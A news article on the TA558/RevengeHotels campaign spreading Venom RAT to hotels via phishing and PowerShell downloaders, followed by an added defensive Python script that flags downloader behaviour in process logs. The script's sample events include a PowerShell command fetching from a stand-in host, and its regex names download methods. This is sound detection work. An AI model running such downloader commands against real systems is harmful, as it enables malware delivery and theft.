TA558 uses AI scripts to attack hotels in Brazil: Venom RAT and a new wave of threats

18.09.2025 2 minutes Author: Newsman

In 2025, the TA558 group, associated with the RevengeHotels cluster, launched a new series of cyberattacks on the hotel industry in Brazil and Spanish-speaking countries. Using AI-generated scripts, hackers spread the Venom RAT to steal data and bypass security systems.

According to Kaspersky analysts, the attacks start with phishing emails whose subject lines refer to accounts and reservations. JavaScript and PowerShell downloaders then fetch files from remote servers; the main malicious payload among them is Venom RAT. This tool, built on the Quasar RAT, costs $650 for a “lifetime license” and is offered in packages with HVNC and Stealer components.

Venom RAT has a wide range of capabilities, from collecting data and using the infected computer as a proxy to anti-kill protection that removes access rights, terminates analyst processes and blocks Microsoft Defender. It also spreads via USB drives, modifies the Windows registry and can install itself as a critical system process so that it keeps running even after attempts to terminate it.

The RevengeHotels group has been active since at least 2015, attacking tourism and hotel organizations in Latin America. Previously, the attackers used infected Word, Excel and PDF documents, exploiting vulnerabilities such as CVE-2017-0199. Their arsenal included Revenge RAT, NjRAT, NanoCoreRAT, Agent Tesla, AsyncRAT, LokiBot, Remcos RAT and others. The main goal of the attacks remains the same: stealing the bank card details of customers of hotels and travel services, including Booking.com.

The TA558 attacks show that cybercriminals are actively integrating artificial intelligence into their operations, automating the creation of scripts and phishing lures. For the hotel and tourism industry, this signals the need to strengthen multi-layered protection, including email filters, behavioral analytics and monitoring of anomalous activity on hosts.
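The following added example, which is not from the article or from Kaspersky's research, applies the host-monitoring advice to the JavaScript and PowerShell downloader chain described above. The event field names, the script host names and the sample events are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumption: process-creation events (e.g. Sysmon Event ID 1) already parsed
# into dicts; the field names below are hypothetical, not from the article.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line traits of a downloader stage that fetches remote content.
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|https?://", re.IGNORECASE)

def score_event(ev):
    """Return the list of indicators present in one process-creation event."""
    parent = PureWindowsPath(ev["parent_image"]).name.lower()
    child = PureWindowsPath(ev["image"]).name.lower()
    cmd = ev.get("command_line", "")
    reasons = []
    if child in SCRIPT_HOSTS and re.search(r"\.jse?\b", cmd, re.IGNORECASE):
        reasons.append("script host running a .js file")
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        reasons.append("script host spawned PowerShell")
    if child in POWERSHELL and DOWNLOAD_HINTS.search(cmd):
        reasons.append("PowerShell command line fetches remote content")
    return reasons

def triage(events, threshold=2):
    """Return (host, reasons) for events with >= threshold indicators."""
    scored = [(ev["host"], score_event(ev)) for ev in events]
    return [(host, r) for host, r in scored if len(r) >= threshold]

# Constructed sample events, not taken from the campaign.
SAMPLE_EVENTS = [
    {"host": "FRONTDESK-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\reception\Downloads\reservation.js"'},
    {"host": "FRONTDESK-01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c \"iwr https://example.invalid/a\""},
    {"host": "ADMIN-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Service"},
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(host, "; ".join(reasons))
```

Requiring two indicators keeps an administrator's ordinary PowerShell session out of the results while still surfacing a script host that launches a PowerShell download.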
